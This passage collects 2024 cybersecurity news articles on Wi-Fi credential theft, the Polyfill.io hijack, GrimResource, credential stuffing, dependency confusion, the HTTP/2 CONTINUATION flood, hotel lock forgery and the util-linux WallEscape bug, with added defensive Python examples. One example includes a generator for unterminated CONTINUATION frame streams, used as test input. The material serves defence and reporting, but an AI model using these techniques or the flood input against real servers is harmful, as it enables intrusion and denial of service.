A subsequent search of his baggage on April 19 led to the seizure of a portable wireless access device, a laptop, and a mobile phone. He was arrested on May 8 after a search warrant was executed at his home.
The individual is said to have staged what's called an evil twin Wi-Fi attack across various locations, including domestic flights and airports in Perth, Melbourne, and Adelaide, to impersonate legitimate Wi-Fi networks.
Users who attempted to connect to the free, phony network were prompted to enter their email address or social media credentials through a captive portal web page.
"The email and password details harvested could be used to access more personal information, including a victim's online communications, stored images and videos, or bank details," the AFP said.
The defendant has been charged with three counts of unauthorized impairment of electronic communication and three counts of possession or control of data with the intent to commit a serious offense.
He has also been charged with one count of unauthorized access or modification of restricted data, one count of dishonestly obtaining or dealing in personal financial information, and one count of possession of identification information. If convicted, he faces up to a maximum of 23 years in prison.
"To connect to a free Wi-Fi network, you shouldn't have to enter any personal details -- such as logging in through an email or social media account," AFP Western Command Cybercrime Detective Inspector Andrea Coleman said.
"If you do want to use public Wi-Fi hotspots, install a reputable virtual private network (VPN) on your devices to encrypt and secure your data when using the internet."
Over 110,000 Websites Affected by Hijacked Polyfill Supply Chain Attack
27.6.24 Hacking The Hacker News
Google has taken steps to block ads for e-commerce sites that use the Polyfill.io service after a Chinese company acquired the domain and modified the JavaScript library ("polyfill.js") to redirect users to malicious and scam sites.
More than 110,000 sites that embed the library are impacted by the supply chain attack, Sansec said in a Tuesday report.
"Protecting our users is our top priority. We detected a security issue recently that may affect websites using certain third-party libraries," the company said in a statement shared with The Hacker News. "To help potentially impacted advertisers secure their websites, we have been proactively sharing information on how to quickly mitigate the issue."
Polyfill is a popular library that incorporates support for modern functions in web browsers. Earlier this February, concerns were raised following its purchase by China-based content delivery network (CDN) company Funnull.
The original creator of the project, Andrew Betts, urged website owners to immediately remove it, adding "no website today requires any of the polyfills in the polyfill[.]io library" and that "most features added to the web platform are quickly adopted by all major browsers, with some exceptions that generally can't be polyfilled anyway, like Web Serial and Web Bluetooth."
The development also prompted web infrastructure providers Cloudflare and Fastly to offer alternative endpoints to help users move away from polyfill[.]io.
"The concerns are that any website embedding a link to the original polyfill[.]io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack," Cloudflare researchers Sven Sauleau and Michael Tremante noted at the time.
"Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
The Dutch e-commerce security firm said the domain "cdn.polyfill[.]io" has since been caught injecting malware that redirects users to sports betting and pornographic sites.
"The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours," it said. "It also does not activate when it detects an admin user. It also delays execution when a web analytics service is found, presumably to not end up in the stats."
San Francisco-based c/side has also issued an alert of its own, noting that the domain maintainers added a Cloudflare Security Protection header to their site between March 7 and 8, 2024.
The findings follow an advisory about a critical security flaw impacting Adobe Commerce and Magento websites (CVE-2024-34102, CVSS score: 9.8) that continues to remain largely unpatched despite fixes being available since June 11, 2024.
"In itself, it allows anyone to read private files (such as those with passwords)," said Sansec, which codenamed the exploit chain CosmicSting. "However, combined with the recent iconv bug in Linux, it turns into the security nightmare of remote code execution."
It has since emerged that third parties can gain API admin access without requiring a Linux version vulnerable to the iconv issue (CVE-2024-2961), making it an even more severe issue.
(The story was updated after publication to include a response from Google.)
New Attack Technique Exploits Microsoft Management Console Files
25.6.24 Hacking The Hacker News
Threat actors are exploiting a novel attack technique in the wild that leverages specially crafted management saved console (MSC) files to gain full code execution using Microsoft Management Console (MMC) and evade security defenses.
Elastic Security Labs has codenamed the approach GrimResource after identifying an artifact ("sccm-updater.msc") that was uploaded to the VirusTotal malware scanning platform on June 6, 2024.
"When a maliciously crafted console file is imported, a vulnerability in one of the MMC libraries can lead to running adversary code, including malware," the company said in a statement shared with The Hacker News.
"Attackers can combine this technique with DotNetToJScript to gain arbitrary code execution, which can lead to unauthorized access, system takeover and more."
The use of uncommon file types as a malware distribution vector is seen as an alternative attempt by adversaries to get around security guardrails erected by Microsoft in recent years, including disabling macros by default in Office files downloaded from the internet.
Last month, South Korean firm Genians detailed the use of a malicious MSC file by the North Korea-linked Kimsuky hacking group to deliver malware.
GrimResource, on the other hand, exploits a cross-site scripting (XSS) flaw present in the apds.dll library to execute arbitrary JavaScript code in the context of MMC. The XSS flaw was originally reported to Microsoft and Adobe in late 2018, although it remains unpatched to date.
This is accomplished by adding a reference to the vulnerable APDS resource in the StringTable section of a malicious MSC file, which, when opened using MMC, triggers the execution of JavaScript code.
The technique not only bypasses ActiveX warnings, it can be combined with DotNetToJScript to gain arbitrary code execution. The analyzed sample uses this approach to launch a .NET loader component dubbed PASTALOADER that ultimately paves the way for Cobalt Strike.
"After Microsoft disabled Office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity," security researchers Joe Desimone and Samir Bousseaden said.
"However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files."
Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
30.4.24 Hacking The Hacker News
Identity and access management (IAM) services provider Okta has warned of a spike in the "frequency and scale" of credential stuffing attacks aimed at online services.
These unprecedented attacks, observed over the last month, are said to be facilitated by "the broad availability of residential proxy services, lists of previously stolen credentials ('combo lists'), and scripting tools," the company said in an alert published Saturday.
The findings build on a recent advisory from Cisco, which cautioned of a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Talos noted at the time, adding that the targets of the attacks comprise VPN appliances from Cisco, Check Point, Fortinet, and SonicWall, as well as routers from Draytek, MikroTik, and Ubiquiti.
Okta said its Identity Threat Research detected an uptick in credential stuffing activity against user accounts from April 19 to April 26, 2024, from likely similar infrastructure.
Credential stuffing is a type of cyber attack in which credentials obtained from a data breach on one service are used to attempt to sign in to another unrelated service.
Alternatively, such credentials could be extracted via phishing attacks that redirect victims to credential harvesting pages or through malware campaigns that install information stealers on compromised systems.
"All recent attacks we have observed share one feature in common: they rely on requests being routed through anonymizing services such as TOR," Okta said.
"Millions of the requests were also routed through a variety of residential proxies including NSOCKS, Luminati, and DataImpulse."
Residential proxies (RESIPs) refer to networks of legitimate user devices that are misused to route traffic on behalf of paying subscribers without their knowledge or consent, thereby allowing threat actors to conceal their malicious traffic.
This is typically achieved by installing proxyware tools on computers, mobile phones, or routers, effectively enrolling them into a botnet that's then rented to customers of the service who desire to anonymize the source of their traffic.
"Sometimes a user device is enrolled in a proxy network because the user consciously chooses to download 'proxyware' into their device in exchange for payment or something else of value," Okta explained.
"At other times, a user device is infected with malware without the user's knowledge and becomes enrolled in what we would typically describe as a botnet."
Last month, HUMAN's Satori Threat Intelligence team revealed over two dozen malicious Android VPN apps that turn mobile devices into RESIPs by means of an embedded software development kit (SDK) that included the proxyware functionality.
"The net sum of this activity is that most of the traffic in these credential stuffing attacks appear to originate from the mobile devices and browsers of everyday users, rather than from the IP space of VPS providers," Okta said.
To mitigate the risk of account takeovers, the company recommends that organizations require users to switch to strong passwords, enable two-factor authentication (2FA), deny requests originating from locations where they don't operate and from IP addresses with poor reputation, and add support for passkeys.
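As an added illustration, and not Okta's code or part of its alert, the following Python sketch shows the two patterns defenders look for when this activity lands in authentication logs: one source address cycling through many accounts with mostly failed logins, and one account attempted from many addresses, which is what traffic spread across residential proxies looks like. The log format, the thresholds, and the KNOWN_PROXY_EXITS set are constructed assumptions.

```python
"""Detection heuristics for credential stuffing and password spraying in auth logs.

Added example, not from Okta's alert or any Okta tooling. The log format and the
thresholds below are assumptions chosen for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample log: "<timestamp> <source_ip> <username> <SUCCESS|FAIL>".
SAMPLE_LOG = """\
2024-04-20T10:00:01Z 203.0.113.10 alice FAIL
2024-04-20T10:00:02Z 203.0.113.10 bob FAIL
2024-04-20T10:00:03Z 203.0.113.10 carol FAIL
2024-04-20T10:00:04Z 203.0.113.10 dave FAIL
2024-04-20T10:00:05Z 203.0.113.10 erin SUCCESS
2024-04-20T10:00:06Z 203.0.113.10 frank FAIL
2024-04-20T10:01:00Z 198.51.100.7 alice SUCCESS
2024-04-20T10:01:10Z 198.51.100.8 alice FAIL
2024-04-20T10:02:00Z 192.0.2.1 admin FAIL
2024-04-20T10:02:01Z 192.0.2.2 admin FAIL
2024-04-20T10:02:02Z 192.0.2.3 admin FAIL
2024-04-20T10:02:03Z 192.0.2.4 admin FAIL
2024-04-20T10:02:04Z 192.0.2.5 admin FAIL
2024-04-20T10:02:05Z 192.0.2.6 admin FAIL
"""

# Constructed stand-in for a proxy / Tor-exit reputation feed (assumption).
KNOWN_PROXY_EXITS = {"203.0.113.10", "192.0.2.3"}


@dataclass
class AuthEvent:
    ts: str
    src_ip: str
    user: str
    success: bool


def parse_log(text):
    """Parse the constructed four-column format into AuthEvent records."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, ip, user, result = line.split()
        events.append(AuthEvent(ts, ip, user, result == "SUCCESS"))
    return events


def find_stuffing_sources(events, min_users=5, min_fail_ratio=0.8):
    """Source IPs that cycle through many distinct accounts with mostly failures.

    Returns {ip: {"attempts", "users", "failures", "known_proxy"}} for flagged IPs.
    """
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set(), "failures": 0})
    for e in events:
        s = per_ip[e.src_ip]
        s["attempts"] += 1
        s["users"].add(e.user)
        if not e.success:
            s["failures"] += 1
    flagged = {}
    for ip, s in per_ip.items():
        ratio = s["failures"] / s["attempts"]
        if len(s["users"]) >= min_users and ratio >= min_fail_ratio:
            flagged[ip] = {
                "attempts": s["attempts"],
                "users": len(s["users"]),
                "failures": s["failures"],
                "known_proxy": ip in KNOWN_PROXY_EXITS,  # enrich with the reputation list
            }
    return flagged


def find_sprayed_accounts(events, min_ips=5):
    """Usernames attempted from many distinct source IPs (proxy-distributed attempts)."""
    ips_per_user = defaultdict(set)
    for e in events:
        ips_per_user[e.user].add(e.src_ip)
    return {u: len(ips) for u, ips in ips_per_user.items() if len(ips) >= min_ips}


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("stuffing sources:", find_stuffing_sources(evs))
    print("sprayed accounts:", find_sprayed_accounts(evs))
```

The second heuristic is the one that matters once traffic is spread across residential proxies: per-IP counts stay low, so the signal moves to the account side (many addresses against one username in a short window), which is also where the geo and reputation denials the alert recommends are applied.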
Apache Cordova App Harness Targeted in Dependency Confusion Attack
24.4.24 Hacking The Hacker News
Researchers have identified a dependency confusion vulnerability impacting an archived Apache project called Cordova App Harness.
Dependency confusion attacks take place because package managers check public repositories before private registries, which allows a threat actor to publish a malicious package with the same name to a public package repository.
This causes the package manager to inadvertently download the fraudulent package from the public repository instead of the intended private registry. If successful, it can have serious consequences, such as compromising all downstream customers that install the package.
A May 2023 analysis of npm and PyPI packages stored in cloud environments by enterprise security company Orca revealed that nearly 49% of organizations are vulnerable to a dependency confusion attack.
While npm and other package managers have since introduced fixes to prioritize the private versions, application security firm Legit Security said it found the Cordova App Harness project to reference an internal dependency named cordova-harness-client without a relative file path.
The open-source initiative was discontinued by the Apache Software Foundation (ASF) as of April 18, 2019.
As Legit Security demonstrated, this left the door wide open for a supply chain attack by uploading a malicious version under the same name with a higher version number, thus causing npm to retrieve the bogus version from the public registry.
The bogus package attracted over 100 downloads after being uploaded to npm, indicating that the archived project is still being put to use and likely posing severe risks to users.
In a hypothetical attack scenario, an attacker could hijack the library to serve malicious code that could be executed on the target host upon package installation.
The Apache security team has since addressed the problem by taking ownership of the cordova-harness-client package. It's worth noting that organizations are advised to create public packages as placeholders to prevent dependency confusion attacks.
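The following Python check is an added example, not Legit Security's or Apache's tooling, of the audit a team can run over its own package.json: every dependency whose name is in a private inventory must be referenced by a local path (or a URL), never by a bare version range that a public package of the same name could satisfy. The INTERNAL_PACKAGES inventory and the sample package.json and .npmrc are constructed; the .npmrc scope check extends the article's single unscoped case to scoped names, which are only safe when their scope is pinned to a private registry.

```python
"""Audit package.json for internal dependency names that npm would resolve from the public registry.

Added example; not code from Legit Security, Apache, or npm. INTERNAL_PACKAGES is
an assumed inventory of names a team publishes only privately.
"""
import json

# Constructed inventory of private package names (assumption).
INTERNAL_PACKAGES = {"cordova-harness-client", "@acme/internal-utils", "@acme/local-tool"}

# Constructed package.json: one unscoped internal name with a version range (the
# article's case), one scoped name, one local-path reference, one public package.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "dependencies": {
        "cordova-harness-client": "^1.0.0",
        "@acme/internal-utils": "^2.1.0",
        "@acme/local-tool": "file:../local-tool",
        "express": "^4.18.2",
    },
})

# Constructed .npmrc pinning the @acme scope to a private registry.
SAMPLE_NPMRC = "@acme:registry=https://npm.internal.example/\n"


def parse_npmrc_scopes(text):
    """Return {"@scope": registry_url} for every '@scope:registry=' line."""
    scopes = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        key, _, value = line.partition("=")
        if key.startswith("@") and key.endswith(":registry"):
            scopes[key[:-len(":registry")]] = value.strip()
    return scopes


def classify_spec(spec):
    """Coarse classification of a dependency spec: local path, URL, or registry range."""
    if spec.startswith(("file:", "link:", "./", "../", "/", "~/")):
        return "path"
    if spec.startswith(("git+", "git:", "github:", "http://", "https://")):
        return "url"
    return "range"   # semver range, tag or exact version resolved through a registry


def audit(package_json_text, npmrc_text="", internal=INTERNAL_PACKAGES):
    """Return [(name, reason)] for internal names that a registry lookup would resolve."""
    data = json.loads(package_json_text)
    scopes = parse_npmrc_scopes(npmrc_text)
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in data.get(section, {}).items():
            if name not in internal or classify_spec(spec) != "range":
                continue
            if not name.startswith("@"):
                findings.append((name, "unscoped internal name with a version range; "
                                       "a public package of the same name would be picked up"))
            else:
                scope = name.split("/")[0]
                if scope not in scopes:
                    findings.append((name, f"scope {scope} is not pinned to a private "
                                           f"registry in .npmrc"))
    return findings


if __name__ == "__main__":
    for name, reason in audit(SAMPLE_PACKAGE_JSON, SAMPLE_NPMRC):
        print(f"{name}: {reason}")
```

Run against the constructed input the audit flags only cordova-harness-client; drop the .npmrc line and @acme/internal-utils is flagged too, because a scope without a pinned registry falls back to the public one. Pairing this with the placeholder packages the article recommends covers the name from both sides.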
"This discovery highlights the need to consider third-party projects and dependencies as potential weak links in the software development factory, especially archived open-source projects that may not receive regular updates or security patches," security researcher Ofek Haviv said.
"Although it may seem tempting to leave them as is, these projects tend to have vulnerabilities that are not getting attention and not likely to be fixed."
BlackTech Targets Tech, Research, and Gov Sectors New 'Deuterbear' Tool
19.4.24 Hacking The Hacker News
Technology, research, and government sectors in the Asia-Pacific region have been targeted by a threat actor called BlackTech as part of a recent cyber attack wave.
The intrusions pave the way for an updated version of a modular backdoor dubbed Waterbear as well as its enhanced successor, referred to as Deuterbear.
"Waterbear is known for its complexity, as it uses a number of evasion mechanisms to minimize the chance of detection and analysis," Trend Micro researchers Cyris Tseng and Pierre Lee said in an analysis last week.
"In 2022, Earth Hundun began using the latest version of Waterbear — also known as Deuterbear — which has several changes, including anti-memory scanning and decryption routines, that make us consider it a different malware entity from the original Waterbear."
The cybersecurity firm is tracking the threat actor under the moniker Earth Hundun, which is known to be active since at least 2007. It also goes by other names such as Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard.
In a joint advisory published last September, cybersecurity and intelligence agencies from Japan and the U.S. attributed the adversary to China, describing its ability to modify router firmware and exploit routers' domain-trust relationships to pivot from international subsidiaries to their corporate headquarters based in the two countries.
"BlackTech actors use custom malware, dual-use tools, and living-off-the-land tactics, such as disabling logging on routers, to conceal their operations," the governments said.
"Upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network."
One of the crucial tools in its multifaceted arsenal is Waterbear (aka DBGPRINT), which has been put to use since 2009 and has been consistently updated over the years with improved defense evasion features.
The core remote access trojan is fetched from a command-and-control (C2) server by means of a downloader, which is launched using a loader that, in turn, is executed via a known technique called DLL side-loading.
The newest version of the implant supports nearly 50 commands, enabling it to perform a wide range of activities, including process enumeration and termination, file operations, window management, starting and exiting a remote shell, screenshot capture, and Windows Registry modification.
Also delivered using a similar infection flow since 2022 is Deuterbear, whose downloader implements an array of obfuscation methods to resist anti-analysis and uses HTTPS for C2 communications.
"Since 2009, Earth Hundun has continuously evolved and refined the Waterbear backdoor, as well as its many variants and branches," the researchers said.
"The Deuterbear downloader employs HTTPS encryption for network traffic protection and implements various updates in malware execution, such as altering the function decryption, checking for debuggers or sandboxes, and modifying traffic protocols."
Cisco Warns of Global Surge in Brute-Force Attacks Targeting VPN and SSH Services
17.4.24 Hacking The Hacker News
Cisco is warning about a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Cisco Talos said.
Successful attacks could pave the way for unauthorized network access, account lockouts, or denial-of-service conditions, the cybersecurity company added.
The attacks, said to be broad and opportunistic, have been observed targeting the below devices -
Cisco Secure Firewall VPN
Checkpoint VPN
Fortinet VPN
SonicWall VPN
RD Web Services
Mikrotik
Draytek
Ubiquiti
Cisco Talos described the brute-forcing attempts as using both generic and valid usernames for specific organizations, with the attacks indiscriminately targeting a wide range of sectors across geographies.
The source IP addresses for the traffic are commonly associated with proxy services. This includes TOR, VPN Gate, IPIDEA Proxy, BigMama Proxy, Space Proxies, Nexus Proxy, and Proxy Rack, among others.
The complete list of indicators associated with the activity, such as the IP addresses and the usernames/passwords, can be accessed here.
The development comes as the networking equipment major warned of password spray attacks targeting remote access VPN services as part of what it said are "reconnaissance efforts."
It also follows a report from Fortinet FortiGuard Labs that threat actors are continuing to exploit a now-patched security flaw impacting TP-Link Archer AX21 routers (CVE-2023-1389, CVSS score: 8.8) to deliver DDoS botnet malware families like AGoent, Condi, Gafgyt, Mirai, Miori, and MooBot.
"As usual, botnets relentlessly target IoT vulnerabilities, continuously attempting to exploit them," security researchers Cara Lin and Vincent Li said.
"Users should be vigilant against DDoS botnets and promptly apply patches to safeguard their network environments from infection, preventing them from becoming bots for malicious threat actors."
New HTTP/2 Vulnerability Exposes Web Servers to DoS Attacks
4.4.24 Hacking The Hacker News
New research has found that the CONTINUATION frame in the HTTP/2 protocol can be exploited to conduct denial-of-service (DoS) attacks.
The technique has been codenamed HTTP/2 CONTINUATION Flood by security researcher Bartek Nowotarski, who reported the issue to the CERT Coordination Center (CERT/CC) on January 25, 2024.
"Many HTTP/2 implementations do not properly limit or sanitize the amount of CONTINUATION frames sent within a single stream," CERT/CC said in an advisory on April 3, 2024.
"An attacker that can send packets to a target server can send a stream of CONTINUATION frames that will not be appended to the header list in memory but will still be processed and decoded by the server or will be appended to the header list, causing an out of memory (OOM) crash."
Like in HTTP/1, HTTP/2 uses header fields within requests and responses. These header fields can comprise header lists, which in turn, are serialized and broken into header blocks. The header blocks are then divided into block fragments and transmitted within HEADER or what's called CONTINUATION frames.
"The CONTINUATION frame (type=0x9) is used to continue a sequence of header block fragments," the documentation for RFC 7540 reads.
"Any number of CONTINUATION frames can be sent, as long as the preceding frame is on the same stream and is a HEADERS, PUSH_PROMISE, or CONTINUATION frame without the END_HEADERS flag set."
The last frame containing headers will have the END_HEADERS flag set, which signals the remote endpoint that it's the end of the header block.
According to Nowotarski, CONTINUATION Flood is a class of vulnerabilities within several HTTP/2 protocol implementations that pose a more severe threat compared to the Rapid Reset attack that came to light in October 2023.
"A single machine (and in certain instances, a mere single TCP connection or a handful of frames) has the potential to disrupt server availability, with consequences ranging from server crashes to substantial performance degradation," the researcher said. "Remarkably, requests that constitute an attack are not visible in HTTP access logs."
The vulnerability, at its core, has to do with incorrect handling of HEADERS and multiple CONTINUATION frames that pave the way for a DoS condition.
In other words, an attacker can initiate a new HTTP/2 stream against a target server using a vulnerable implementation and send HEADERS and CONTINUATION frames with no set END_HEADERS flag, creating a never-ending stream of headers that the HTTP/2 server would need to parse and store in memory.
While the exact outcome varies by implementation, impacts range from an instant crash after only a couple of HTTP/2 frames, to an out-of-memory crash, to CPU exhaustion, all of which affect server availability.
"RFC 9113 [...] mentions multiple security issues that may arise if CONTINUATION frames are not handled correctly," Nowotarski said.
"At the same time, it does not mention a specific case in which CONTINUATION frames are sent without the final END_HEADERS flag which can have repercussions on affected servers."
The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang (CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js (CVE-2024-27983), and Tempesta FW (CVE-2024-2758).
Users are recommended to upgrade affected software to the latest version to mitigate potential threats. In the absence of a fix, it's advised to consider temporarily disabling HTTP/2 on the server.
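To make the framing concrete, here is an added Python example (not code from CERT/CC, the researcher, or any of the affected projects) that parses HTTP/2 frames, strips the padding, priority and promised-stream fields to get the header block fragment, and accumulates fragments the way a hardened endpoint should: only CONTINUATION frames on the same stream may follow an unterminated HEADERS, and both the byte size and the frame count of the pending block are capped before anything is stored. The limits are assumed values, the sample frame sequences are constructed, and HPACK decoding of the finished block is left out.

```python
"""Bounded handling of HTTP/2 header block fragments (HEADERS + CONTINUATION).

Added example; not code from CERT/CC, the researcher, or any listed project. It
implements the frame layout from RFC 7540/9113 and the checks a hardened endpoint
applies before storing anything: size and frame-count caps on the pending block.
Limits are assumed values; HPACK decoding is out of scope.
"""
import struct

HEADERS, PUSH_PROMISE, CONTINUATION = 0x1, 0x5, 0x9   # frame types
END_HEADERS, PADDED, PRIORITY = 0x4, 0x8, 0x20        # flags used here


class ProtocolError(Exception):
    """Where a real server would send GOAWAY / RST_STREAM and stop parsing."""


def build_frame(ftype, flags, stream_id, payload):
    """Serialize one frame: 24-bit length, type, flags, R + 31-bit stream id, payload."""
    if len(payload) >= 1 << 24:
        raise ValueError("payload exceeds the 24-bit length field")
    return (struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def iter_frames(data):
    """Yield (type, flags, stream_id, payload) for each frame in a byte string."""
    off = 0
    while off < len(data):
        if len(data) - off < 9:
            raise ProtocolError("truncated frame header")
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = struct.unpack(">I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ProtocolError("truncated frame payload")
        off += 9 + length
        yield ftype, flags, stream_id, payload


def header_fragment(ftype, flags, payload):
    """Return only the header block fragment, removing padding/priority/promised-id fields."""
    pad = 0
    if ftype in (HEADERS, PUSH_PROMISE) and flags & PADDED:
        if not payload:
            raise ProtocolError("PADDED frame without a pad length byte")
        pad, payload = payload[0], payload[1:]
    if ftype == HEADERS and flags & PRIORITY:
        payload = payload[5:]          # stream dependency (4 bytes) + weight (1 byte)
    if ftype == PUSH_PROMISE:
        payload = payload[4:]          # promised stream id
    if pad > len(payload):
        raise ProtocolError("padding exceeds payload")
    return payload[:len(payload) - pad]


class HeaderBlockCollector:
    """One per connection: header blocks cannot interleave across streams."""

    def __init__(self, max_block_bytes=16 * 1024, max_continuations=8):
        self.max_block_bytes = max_block_bytes      # assumed cap on the pending block
        self.max_continuations = max_continuations  # assumed cap on frames per block
        self.open_stream = None
        self._buf = bytearray()
        self._continuations = 0

    def feed(self, ftype, flags, stream_id, payload):
        """Feed one frame; return (stream_id, header_block) when END_HEADERS closes a block."""
        if self.open_stream is None:
            if ftype == CONTINUATION:
                raise ProtocolError("CONTINUATION with no open header block")
            if ftype not in (HEADERS, PUSH_PROMISE):
                return None                      # other frame types are not handled here
            self.open_stream, self._buf, self._continuations = stream_id, bytearray(), 0
        else:
            # Only CONTINUATION on the same stream may follow until END_HEADERS is seen.
            if ftype != CONTINUATION or stream_id != self.open_stream:
                raise ProtocolError("header block on stream %d interrupted" % self.open_stream)
            self._continuations += 1
            if self._continuations > self.max_continuations:
                raise ProtocolError("too many CONTINUATION frames on stream %d" % stream_id)
        frag = header_fragment(ftype, flags, payload)
        if len(self._buf) + len(frag) > self.max_block_bytes:   # check before storing
            raise ProtocolError("header block on stream %d exceeds %d bytes"
                                % (stream_id, self.max_block_bytes))
        self._buf += frag
        if flags & END_HEADERS:
            result = (self.open_stream, bytes(self._buf))
            self.open_stream, self._buf = None, bytearray()
            return result
        return None


def process(data, **limits):
    """Parse a byte stream of frames; return completed header blocks, raise on violations."""
    collector = HeaderBlockCollector(**limits)
    blocks = []
    for frame in iter_frames(data):
        block = collector.feed(*frame)
        if block is not None:
            blocks.append(block)
    return blocks


def benign_stream():
    """Constructed: one header block split across HEADERS and two CONTINUATION frames."""
    return (build_frame(HEADERS, 0, 1, b"a" * 10)
            + build_frame(CONTINUATION, 0, 1, b"b" * 10)
            + build_frame(CONTINUATION, END_HEADERS, 1, b"c" * 10))


def unterminated_stream(n_continuations, chunk=100):
    """Constructed: HEADERS plus n CONTINUATION frames, none carrying END_HEADERS."""
    return (build_frame(HEADERS, 0, 1, b"x" * chunk)
            + build_frame(CONTINUATION, 0, 1, b"x" * chunk) * n_continuations)
```

The collector rejects an unterminated sequence at the ninth CONTINUATION frame or at the byte cap, whichever comes first, so memory held for a stream that never sends END_HEADERS is bounded by the caps rather than by the peer. In production the rejection should also be logged at the frame layer, since, as the article notes, these requests never reach the HTTP access log.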
Dormakaba Locks Used in Millions of Hotel Rooms Could Be Cracked in Seconds
30.3.24 Hacking The Hacker News
Security vulnerabilities discovered in Dormakaba's Saflok electronic RFID locks used in hotels could be weaponized by threat actors to forge keycards and stealthily slip into locked rooms.
The shortcomings have been collectively named Unsaflok by researchers Lennert Wouters, Ian Carroll, rqu, BusesCanFly, Sam Curry, sshell, and Will Caruana. They were reported to the Zurich-based company in September 2022.
"When combined, the identified weaknesses allow an attacker to unlock all rooms in a hotel using a single pair of forged keycards," they said.
Full technical specifics about the vulnerabilities have been withheld, considering the potential impact, and are expected to be made public in the future.
The issues impact more than three million hotel locks spread across 13,000 properties in 131 countries. This includes the Saflok MT model and the Quantum, RT, Saffire, and Confidant series devices, which are used in combination with the System 6000, Ambiance, and Community management software.
Dormakaba is estimated to have updated or replaced 36% of the impacted locks as of March 2024 as part of a rollout process that commenced in November 2023. Some of the vulnerable locks have been in use since 1988.
"An attacker only needs to read one keycard from the property to perform the attack against any door in the property," the researchers said. "This keycard can be from their own room, or even an expired keycard taken from the express checkout collection box."
The forged cards can be created using any MIFARE Classic card or any commercially available RFID read-write tools that are capable of writing data to these cards. Alternatively, Proxmark3, Flipper Zero, or even an NFC capable Android phone can be used in place of the cards.
Speaking to WIRED's Andy Greenberg, the researchers said the attack entails reading a certain code from that card and creating a pair of forged keycards using the aforementioned method – one to reprogram the data on the lock and another to open it by cracking Dormakaba's Key Derivation Function (KDF) encryption system.
"Two quick taps and we open the door," Wouters was quoted as saying.
Another crucial step involves reverse engineering the lock programming devices distributed by Dormakaba to hotels and the front desk software for managing keycards, thereby allowing the researchers to spoof a working master key that could be used to unlock any room.
There is currently no confirmed case of exploitation of these issues in the wild, although the researchers don't rule out the possibility that the vulnerabilities have been discovered or used by others.
"It may be possible to detect certain attacks by auditing the lock's entry/exit logs," they added. "Hotel staff can audit this via the HH6 device and look for suspicious entry/exit records. Due to the vulnerability, entry/exit records could be attributed to the wrong keycard or staff member."
The disclosure comes on the back of the discovery of three critical security vulnerabilities in commonly used Electronic Logging Devices (ELDs) in the trucking industry that could be weaponized to enable unauthorized control over vehicle systems and manipulate data and vehicle operations arbitrarily.
Even more concerningly, one of the flaws could pave the way for a self-propagating truck-to-truck worm, potentially leading to widespread disruptions in commercial fleets and leading to severe safety consequences.
New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking
30.3.24 Hacking The Hacker News
Details have emerged about a vulnerability impacting the "wall" command of the util-linux package that could be potentially exploited by a bad actor to leak a user's password or alter the clipboard on certain Linux distributions.
The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper neutralization of escape sequences.
"The util-linux wall command does not filter escape sequences from command line arguments," Ferrante said. "This allows unprivileged users to put arbitrary text on other users' terminals, if mesg is set to 'y' and wall is setgid."
The vulnerability was introduced as part of a commit made in August 2013.
The "wall" command is used to write a message to the terminals of all users that are currently logged in to a server, essentially allowing users with elevated permissions to broadcast key information to all local users (e.g., a system shutdown).
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "Only the superuser can write on the terminals of users who have chosen to deny messages or are using a program which automatically denies messages."
CVE-2024-28085 essentially exploits improperly filtered escape sequences supplied via command line arguments to display a fake sudo (aka superuser do) prompt on other users' terminals and trick them into entering their passwords.
However, for this to work, the mesg utility – which controls the ability to display messages from other users – has to be set to "y" (i.e., enabled) and the wall command has to have setgid permissions.
CVE-2024-28085 impacts Ubuntu 22.04 and Debian Bookworm as these two criteria are met. On the other hand, CentOS is not vulnerable since the wall command does not have setgid.
"On Ubuntu 22.04, we have enough control to leak a user's password by default," Ferrante said. "The only indication of attack to the user will be an incorrect password prompt when they correctly type their password, along with their password being in their command history."
Similarly, on systems that allow wall messages to be sent, an attacker could potentially alter a user's clipboard through escape sequences on select terminals like Windows Terminal. It does not work on GNOME Terminal.
Users are advised to update to util-linux version 2.40 to mitigate against the flaw.
